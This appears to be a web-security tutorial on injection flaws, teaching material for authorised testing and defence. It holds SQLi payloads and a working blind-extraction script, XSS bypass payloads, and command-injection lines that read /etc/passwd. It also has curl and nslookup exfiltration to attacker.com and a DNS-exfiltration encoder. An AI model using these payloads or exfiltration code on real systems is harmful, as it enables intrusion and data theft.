Web Vulnerability Classes

Injection Attacks


Injection sits at A05 in the OWASP Top 10:2025 (down from A03 in 2021) but remains one of the most damaging classes. SQL injection, cross-site scripting (which OWASP groups under injection) and OS command injection lead directly to data breaches, account takeover and remote code execution.

SQL Injection

User input is concatenated into the text of a SQL query and executed by the database, so quote characters in the input change the query's structure:

Detection

# Basic test payloads (single- and double-quoted string contexts)
' OR '1'='1
" OR "1"="1
' OR '1'='1' -- 
'; SELECT * FROM users --   # stacked query; only where the driver allows multiple statements
1' AND '1'='1   # true condition
1' AND '1'='2   # false condition: compare the two responses
# MySQL requires a space after -- (or use #); a lone ' that changes the response is the first signal

Error-Based SQLi

Force the database to embed query results in an error message that the application echoes back (MySQL shown):

# MySQL: duplicate-entry error on GROUP BY carries the value of database()
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) -- 

# Simpler version (MySQL 5.1+): the XPath error echoes the concatenated string.
# extractvalue() shows at most 32 characters; page through longer values with SUBSTRING()
' AND extractvalue(1,concat(0x7e,(SELECT version()))) -- 

Blind SQLi

No query output and no error text reach the response; infer one bit per request from response differences or timing:

# Boolean-based
' AND 1=1 --   # true condition
' AND 1=2 --   # false condition
# Compare the responses: length, a specific string, status code

# Time-based
' AND SLEEP(5) --            # MySQL
'; SELECT pg_sleep(5) --     # PostgreSQL, stacked query
'||pg_sleep(5) --            # PostgreSQL, inline in a string context (pg_sleep returns void, so AND pg_sleep(5) errors)
'; WAITFOR DELAY '0:0:5' --  # MSSQL, stacked query
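An added Python example, not from the original page, that ties the detection and blind sections together: the vulnerable string-built query, the `' OR '1'='1` bypass run against it, the parameterised fix, and a boolean-based blind extractor that recovers a column value at about seven requests per character by binary search. It uses an in-memory SQLite table as a constructed stand-in for the target database; the `admin'` prefix, the table layout and the function names are assumptions of the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory user table (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("admin", "5f4dcc3b5aa765d9"), ("alice", "e99a18c428cb38d5")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable: the request parameter is spliced into the query text."""
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Fixed: bound parameter. The driver sends the value separately from
    the query text, so quotes in it never reach the SQL parser as SQL."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()


STATS = {"queries": 0}


def oracle(conn: sqlite3.Connection, payload: str) -> bool:
    """Boolean oracle (the 'compare responses' step): True when the injected
    WHERE clause matches a row, i.e. the page would render a profile; False
    when nothing matches or the query errors out."""
    STATS["queries"] += 1
    try:
        return len(find_user_vulnerable(conn, payload)) > 0
    except sqlite3.Error:
        return False


def extract_blind(conn: sqlite3.Connection, expr: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction of the scalar SQL expression `expr`,
    one character per position, by binary search over printable ASCII
    (32..126): at most 7 requests per character instead of up to 95."""
    out = ""
    for pos in range(1, max_len + 1):
        # Length probe first, so the loop stops at the end of the string.
        if not oracle(conn, f"admin' AND length(({expr})) >= {pos} -- "):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite: unicode(substr(x, pos, 1)) is the code point at pos;
            # MySQL would use ASCII(SUBSTRING(x, pos, 1)).
            cond = f"unicode(substr(({expr}),{pos},1)) <= {mid}"
            if oracle(conn, f"admin' AND {cond} -- "):
                hi = mid
            else:
                lo = mid + 1
        out += chr(lo)
    return out


def demo() -> dict:
    conn = make_db()
    STATS["queries"] = 0
    bypass = "' OR '1'='1"
    secret = extract_blind(
        conn, "SELECT password_hash FROM users WHERE username = 'admin'"
    )
    return {
        "vulnerable_rows": len(find_user_vulnerable(conn, bypass)),  # both users
        "safe_rows": len(find_user_safe(conn, bypass)),              # nothing
        "admin_hash": secret,
        "queries": STATS["queries"],
    }


if __name__ == "__main__":
    print(demo())
```

Against a real target the oracle is an HTTP request and the comparison is on something stable in the response (a string, the length, the status code); the search loop is unchanged. The query count is why blind SQLi is slow but still practical: sixteen characters cost roughly 130 requests here.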

Automated Testing

# Using sqlmap
sqlmap -u "https://example.com/search?q=test" --dbs --batch

# With captured request
sqlmap -r request.txt --dbs --batch

# POST parameter
sqlmap -u "https://example.com/login" --data="user=test&pass=test" -p user

Cross-Site Scripting (XSS)

Attacker-controlled script runs in the victim's browser with the origin of the vulnerable site, so it can read cookies the site exposes, the DOM, and any request the page can make:

Types

Type        Where the payload persists            Typical example
Reflected   Single request/response only          Search results page
Stored      Server side (database, file)          Comments, profile fields
DOM-based   Client side only (page JavaScript)    URL fragment read by the page's own script

Testing Payloads

<!-- Basic -->
<script>alert('XSS')</script>

<!-- Event handlers: also fire when markup is inserted via innerHTML, where <script> does not execute -->
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

<!-- Filter bypass: mixed case, no literal string, quoted handler -->
<ScRiPt>alert('XSS')</ScRiPt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror="alert('XSS')">

<!-- URL sinks (href, location, window.open), the usual DOM XSS case; data: URLs are blocked for top-level navigation in current browsers -->
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>

Context-Specific Payloads

<!-- Inside a quoted HTML attribute: close the value, add a handler that fires on its own -->
" onfocus=alert('XSS') autofocus="

<!-- Inside a JavaScript string: close the string, or close the whole script element (the HTML parser does not know it is inside a JS string) -->
';alert('XSS');//
</script><script>alert('XSS')</script>

<!-- Inside a URL attribute (href, src): a scheme the browser executes -->
javascript:alert('XSS')
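The payloads above work because the same value is read by different parsers (HTML, attribute, JavaScript, URL) depending on where it lands, so the defence has to match the context. The following is an added example, not code from the page: per-context output encoders in Python, a demonstration that HTML-escaping alone is undone in a nested context (JavaScript inside an event-handler attribute), and a scheme allowlist for URL sinks where percent-encoding cannot help. The template, the `PAYLOADS` dictionary and the function names are constructed for the example.

```python
import html
import json
import re
from typing import Optional
from urllib.parse import quote

# Constructed test inputs: the context-breaking payloads listed above.
PAYLOADS = {
    "html_body": "<script>alert('XSS')</script>",
    "attribute": "\" onfocus=alert('XSS') autofocus=\"",
    "js_string": "';alert('XSS');//",
    "js_breakout": "</script><script>alert('XSS')</script>",
    "url": "javascript:alert('XSS')",
}


def encode_html_body(value: str) -> str:
    """Element content: entity-encode & < > \" and '."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """Quoted attribute value. The surrounding quotes are part of the output:
    an unquoted attribute can be broken out of with a space alone."""
    return '"' + html.escape(value, quote=True) + '"'


def encode_js_string(value: str) -> str:
    """String literal inside a <script> block. json.dumps() yields a valid JS
    literal; < > & are additionally \\u-escaped because the HTML parser ends
    the script element at '</script>' regardless of JS string state."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def encode_js_in_attr(value: str) -> str:
    """String literal inside an inline handler (onclick=\"f('...')\"). The
    browser entity-decodes the attribute and only then hands it to the JS
    parser, so encode for the inner context (JS) first, outer (HTML) second."""
    return html.escape(encode_js_string(value), quote=True)


def wrong_html_escape_in_handler(value: str) -> str:
    """The common mistake: one HTML encoder used for every context."""
    return html.escape(value, quote=True)


SAFE_SCHEMES = ("http:", "https:", "mailto:")


def encode_url_href(value: str) -> Optional[str]:
    """href/src sink. Percent-encoding cannot help: 'javascript:alert(1)' is a
    well-formed URL, so allowlist the scheme (or a same-origin path) instead.
    Control characters are removed before the check because browsers ignore
    them inside the scheme ('java\\tscript:' still runs)."""
    probe = re.sub(r"[\x00-\x20]", "", value).lower()
    same_origin_path = probe.startswith("/") and not probe.startswith("//")
    if not (probe.startswith(SAFE_SCHEMES) or same_origin_path):
        return None
    # Percent-encode what is left; the caller still attribute-encodes it.
    return quote(value, safe=":/?#[]@!$&'()*+,;=%")


def js_engine_sees(attr_value: str) -> str:
    """Model the browser: inline-handler source is the entity-decoded attribute."""
    return html.unescape(attr_value)


def render_profile(name: str, link: str) -> str:
    """Constructed template placing one untrusted value into four contexts."""
    href = encode_url_href(link)
    link_html = f"<a href={encode_html_attr(href)}>site</a>" if href else ""
    return (
        f"<h1>{encode_html_body(name)}</h1>\n"
        f"<input value={encode_html_attr(name)}>\n"
        f"<script>var user = {encode_js_string(name)};</script>\n"
        f'<button onclick="greet({encode_js_in_attr(name)})">hi</button>\n'
        f"{link_html}"
    )


if __name__ == "__main__":
    print(render_profile(PAYLOADS["html_body"], PAYLOADS["url"]))
```

When reviewing a template engine's auto-escaping, the nested case is the one to check: a value that is HTML-escaped once and then placed inside an `onclick` or inline `<script>` is decoded back to the attacker's quotes before JavaScript ever sees it.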

Automation

# Using dalfox
dalfox url "https://example.com/search?q=FUZZ" --blind https://your-callback.com

# Multiple URLs
cat urls.txt | dalfox pipe --blind https://callback.com

Command Injection

User input is concatenated into a command line that the application hands to a shell (`sh -c`, `cmd /c`), so shell metacharacters in the input start new commands:

Detection

# Linux payloads (sh/bash)
; ls -la
| cat /etc/passwd
`whoami`
$(id)
; sleep 10    # time-based
&& sleep 10   # also try && and ||: which one fires depends on the first command's exit status

# Windows payloads (cmd.exe: ';' is not a separator, use & && | ||)
& dir
| type C:\Windows\win.ini
& ping -n 10 127.0.0.1   # time-based, roughly 10 s

Common Vulnerable Functions

Language   Dangerous functions (when user input reaches the command string)
PHP        system(), exec(), shell_exec(), passthru(), popen(), backtick operator
Python     os.system(), os.popen(), subprocess.call()/run() with shell=True
Node.js    child_process.exec(), execSync() (both spawn a shell)
Java       Runtime.exec() / ProcessBuilder only when the app itself runs "sh -c" or "cmd /c"; Runtime.exec(String) tokenises on whitespace and does not invoke a shell

eval() in Python or Node.js is code injection rather than command injection, but the result (arbitrary execution on the server) is the same.

Testing Methodology

# Step 1: Find input that might reach OS commands
# - File operations (filename parameter, archive/convert/export features)
# - Network operations (hostname or IP passed to ping, traceroute, nslookup)
# - System info displays

# Step 2: Test with time-based payloads
# Inject: ; sleep 10
# A response delayed by about 10 s against a measured baseline means the input reaches a shell

# Step 3: Extract data
# Inject: ; curl https://attacker.com/$(whoami)
# Check your server logs (this also confirms the host has outbound egress)
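An added Python example, not from the original page, that ties the function table and the three-step methodology together: a vulnerable `subprocess.run(..., shell=True)` call, the Step 2 time-based probe run against it, and the hardened forms (argument list without a shell, `shlex.quote()` when a shell is unavoidable, and an allowlist check that also stops option injection). `echo` stands in for ping or nslookup so the example runs offline; the function names and the hostname pattern are the author's choices.

```python
import re
import shlex
import subprocess
import time

# Hostname allowlist (RFC 1123 labels): letters, digits and hyphens, no label
# starting or ending with a hyphen. Rejects shell metacharacters and also
# option injection such as a value beginning with '-'.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def lookup_vulnerable(host: str) -> str:
    """Vulnerable: the parameter is interpolated into a shell command line.
    The shell treats ';', '|', '$(...)' and backticks identically whichever
    program follows, so echo here behaves exactly like ping would."""
    proc = subprocess.run(f"echo checking {host}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def lookup_argv(host: str) -> str:
    """Safer: argument list and no shell, so metacharacters are plain bytes in
    argv. This alone does not stop option injection (a value starting with
    '-'), which the called program may still interpret."""
    proc = subprocess.run(["echo", "checking", host],
                          capture_output=True, text=True)
    return proc.stdout


def lookup_quoted(host: str) -> str:
    """If a shell is unavoidable (pipes, redirection), shlex.quote() wraps
    the value in single quotes and escapes embedded single quotes."""
    proc = subprocess.run(f"echo checking {shlex.quote(host)}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def lookup_hardened(host: str) -> str:
    """Defence in depth: allowlist-validate first, then argv without a shell."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return lookup_argv(host)


def probe_time_based(lookup, base: str, delay: int = 2) -> bool:
    """Step 2 of the methodology: inject '; sleep N' and compare the elapsed
    time with a baseline request. Works when command output is not echoed."""
    t0 = time.monotonic()
    lookup(base)
    baseline = time.monotonic() - t0
    t0 = time.monotonic()
    lookup(f"{base}; sleep {delay}")
    injected = time.monotonic() - t0
    return (injected - baseline) >= 0.8 * delay


if __name__ == "__main__":
    print(lookup_vulnerable("example.com; id"))      # runs id
    print(lookup_argv("example.com; id"))            # prints the literal text
    print(probe_time_based(lookup_vulnerable, "example.com", 1))  # True
```

The probe always measures a baseline first: a slow target can look "vulnerable" on absolute timing alone, and a second run with a different delay (5 s, then 10 s) is the usual confirmation before reporting.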

Out-of-Band Testing

When the command runs but nothing from it appears in the response (blind command injection), make the target send the data to you over DNS or HTTP:

# DNS exfiltration (DNS is case-insensitive and a label is at most 63 characters)
; nslookup $(whoami).attacker.com

# HTTP callback (base64 -w0 avoids newlines; '+' and '/' still need URL-encoding, or POST the body instead)
; curl "https://attacker.com/?data=$(base64 -w0 /etc/passwd)"
; curl -X POST --data-binary @/etc/passwd https://attacker.com/

# Using Burp Collaborator (payload domains are now *.oastify.com; burpcollaborator.net is the legacy domain)
; nslookup <burp-collaborator-payload>.oastify.com
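The `nslookup $(whoami).attacker.com` payload fits a single label; anything larger has to be split into DNS-safe pieces before it can leave. The following added Python example, not code from the page, generalises that: an encoder that packs arbitrary bytes into names that respect the 63-character label and 253-character name limits, and the decoder a listener would run on its query log, which tolerates reordering and duplicates and detects lost chunks. `attacker.example`, the sample passwd lines and the chunk format are constructed for the example.

```python
import base64
import binascii

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # practical limit for a full textual name

# Constructed sample input standing in for /etc/passwd (not real data).
SAMPLE_PASSWD = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    b"app:x:1000:1000::/home/app:/bin/bash\n"
) * 4


def encode_for_dns(data: bytes, domain: str) -> list:
    """Split data into queries of the form <seq>.<label>...<label>.<domain>.
    Base32 rather than base64: DNS is case-insensitive and '+', '/', '='
    are not hostname characters. A 4-byte length header lets the receiver
    notice a lost final chunk; <seq> lets it reorder the rest."""
    payload = len(data).to_bytes(4, "big") + data
    b32 = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    names, seq, pos = [], 0, 0
    while pos < len(b32):
        prefix_len = len(str(seq)) + 1                   # "<seq>."
        budget = MAX_NAME - len(domain) - prefix_len     # room for "<label>." units
        labels_fit = budget // (MAX_LABEL + 1)
        if labels_fit < 1:
            raise ValueError("domain too long to carry any payload")
        chunk = b32[pos:pos + labels_fit * MAX_LABEL]
        pos += len(chunk)
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        names.append(".".join([str(seq), *labels, domain]))
        seq += 1
    return names


def is_valid_dns_name(name: str) -> bool:
    """Sanity check a generated name against the label/name limits."""
    labels = name.split(".")
    return len(name) <= MAX_NAME and all(
        0 < len(lbl) <= MAX_LABEL and lbl.isascii() and lbl.replace("-", "").isalnum()
        for lbl in labels
    )


def decode_from_dns(queries: list, domain: str) -> bytes:
    """Listener side: reassemble from observed query names. Unrelated queries
    are skipped, duplicates and reordering (resolver retries, caching) are
    tolerated, and gaps or a truncated tail raise instead of returning
    silently truncated data."""
    suffix = "." + domain.lower()
    chunks = {}
    for q in queries:
        q = q.rstrip(".").lower()
        if not q.endswith(suffix):
            continue
        seq, *labels = q[:-len(suffix)].split(".")
        chunks[int(seq)] = "".join(labels)
    if not chunks:
        raise ValueError("no matching queries")
    missing = [i for i in range(max(chunks) + 1) if i not in chunks]
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    b32 = "".join(chunks[i] for i in sorted(chunks))
    b32 += "=" * (-len(b32) % 8)                         # restore base32 padding
    try:
        raw = base64.b32decode(b32.upper())
    except binascii.Error as exc:
        raise ValueError(f"corrupt payload: {exc}") from exc
    expected = int.from_bytes(raw[:4], "big")
    if len(raw) - 4 != expected:
        raise ValueError(f"expected {expected} bytes, got {len(raw) - 4}")
    return raw[4:]


if __name__ == "__main__":
    for n in encode_for_dns(SAMPLE_PASSWD, "attacker.example"):
        print(len(n), n)
```

The names are what the injected command would resolve, one `nslookup` (or `dig`, or `getent hosts`) each; on the listener side, an authoritative nameserver for the domain logging every query name is all that is needed, since the data travels in the question, not the answer.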

Real-World Bounty Examples

Type                Company   Impact                 Bounty
SQLi                Yahoo     Database access        $10,000
Stored XSS          Twitter   Account takeover       $7,500
Command injection   Netflix   RCE on server          $15,000
Blind SQLi          Uber      User data extraction   $5,000

Testing Tips

  1. Test every input: form fields, headers (User-Agent, Referer, X-Forwarded-For), cookies, URL and body parameters
  2. Check the context each input lands in: HTML, JavaScript, SQL, shell; the payload that breaks one does nothing in another
  3. Use encoding: URL-encode, HTML-encode or double-encode payloads when the plain version is filtered
  4. Chain vulnerabilities: an XSS that reads the anti-CSRF token and submits the password-change form as the victim is an account takeover

Pro Tip: Modern WAFs block basic payloads. Learn encoding tricks and context-specific bypasses.

Next, we'll explore authentication and session vulnerabilities.
